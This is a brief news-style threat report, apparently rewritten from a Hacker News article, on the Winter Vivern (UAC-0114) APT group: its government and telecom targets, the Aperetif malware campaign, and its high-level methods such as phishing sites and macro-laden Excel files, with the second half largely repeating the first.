Winter Vivern, also known as UAC-0114, is a advanced persistent threat that has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021. The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The Hacker News. "Of particular interest is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war," senior threat researcher Tom Hegel said. Winter Vivern drew attention last month after the Computer Emergency Response Team of Ukraine (CERT-UA) detailed a new malware campaign aimed at state authorities of Ukraine and Poland to deliver a piece of malware dubbed Aperetif. Previous public reports chronicling the group show that it has leveraged weaponized Microsoft Excel documents containing XLM macros to deploy PowerShell implants on compromised hosts. While the origins of the threat actor are unknown, the attack patterns suggest that the cluster is aligned with objectives that support the interests of Belarus and Russia's governments. UAC-0114 has employed a variety of methods, ranging from phishing websites to malicious documents, that are tailored to the targeted organization to distribute its custom payloads and gain unauthorized access to sensitive systems. The Winter Vivern, or UAC-0114, is a advanced persistent threat that has been linked to several high-profile campaigns against government officials. The group, which is believed to be operating out of Belarus or Russia, has been active since at least 2021 and has targeted government agencies and officials in Poland, Ukraine, Italy, and India. The group is believed to be behind a recent campaign that used a piece of malware dubbed Aperetif to target state authorities in Ukraine and Poland. The Winter Vivern has employed a variety of methods to distribute its malware and gain unauthorized access to sensitive systems. These methods have included phishing websites and malicious documents that are tailored to the specific organization that is being targeted. In some cases, the group has leveraged weaponized Microsoft Excel documents that contain XLM macros in order to deploy PowerShell implants on compromised hosts. The origins of the Winter Vivern are currently unknown, but the group's attack patterns suggest that they are aligned with the interests of the Belarusian and Russian governments. The group has been increasingly active in recent months, and it is likely that we will see more high-profile attacks from this group in the future.
top of page
bottom of page